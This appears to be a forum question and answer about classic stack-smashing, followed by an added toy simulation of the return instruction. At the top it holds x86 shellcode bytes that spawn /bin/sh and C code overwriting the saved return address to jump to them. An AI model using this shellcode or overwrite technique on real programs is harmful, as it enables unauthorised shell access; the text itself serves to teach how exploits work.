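/* Machine-code bytes; the tail "\x2f\x62\x69\x6e\x2f\x73\x68" is "/bin/sh". */
char shellcode[] =
    "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00"
    "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
    "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";

void main() {
    int *ret;
    ret = (int *)&ret + 2;     /* two ints above the local: the saved return address slot this code assumes */
    (*ret) = (int)shellcode;   /* the array name decays to a pointer, so this is its address cast to int */
}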
To my knowledge, shellcode[] is the hex opcode for spawning a shell, and the last line of the code overwrites the ret with the opcode. Do we insert an opcode or a memory address into RET?
The ret register on the stack is a location that code gets returned to; putting an opcode there wouldn't be of much help. I suspect an address to code you want to run is the most likely candidate. Yay! It's probably best overall to consider what the items you are interacting with are used for, and how they get used, rather than trying to blindly dump data into them.
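
Added example, not part of the original thread: a toy model of what `ret` does with the saved slot, showing that the popped word is loaded into the program counter as an address and is never decoded as an instruction. The 64-byte memory, the opcodes and all names here are constructed for illustration and do not correspond to any real CPU.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy machine, constructed for illustration: 64 bytes of memory and
   made-up opcodes. It models only what `ret` does with the saved slot. */
enum { MEM_SIZE = 64, PAYLOAD_ADDR = 16, RET_SLOT = 40 };
enum { OP_MARK = 0xA1, OP_HALT = 0xF4 };
enum { RAN_PAYLOAD = 1, FAULT = -1 };

static const uint8_t payload[4] = { OP_MARK, OP_HALT, OP_HALT, OP_HALT };

/* Put `slot_value` in the return-address slot, execute one `ret`, and
   report what the machine does next. */
int ret_with_slot(uint32_t slot_value) {
    uint8_t mem[MEM_SIZE] = {0};
    uint32_t sp = RET_SLOT, pc;

    memcpy(&mem[PAYLOAD_ADDR], payload, sizeof payload);
    memcpy(&mem[sp], &slot_value, sizeof slot_value);

    /* ret: pop a word and load it into the program counter. The word is
       never decoded as an instruction; it only says where to fetch from. */
    memcpy(&pc, &mem[sp], sizeof pc);
    sp += sizeof pc;

    if (pc >= MEM_SIZE)
        return FAULT;                 /* popped word is not a mapped address */
    return mem[pc] == OP_MARK ? RAN_PAYLOAD : 0;
}

/* The payload's first four bytes reinterpreted as a word: what lands in the
   slot if the opcodes themselves are copied there. */
uint32_t payload_bytes_as_word(void) {
    uint32_t w;
    memcpy(&w, payload, sizeof w);
    return w;
}

int main(void) {
    printf("slot = address of payload -> %d\n", ret_with_slot(PAYLOAD_ADDR));
    printf("slot = payload bytes      -> %d\n",
           ret_with_slot(payload_bytes_as_word()));
    return 0;
}
```

With the payload's address in the slot the model continues at the payload; with the payload's bytes in the slot the popped word is treated as an out-of-range address and the model faults.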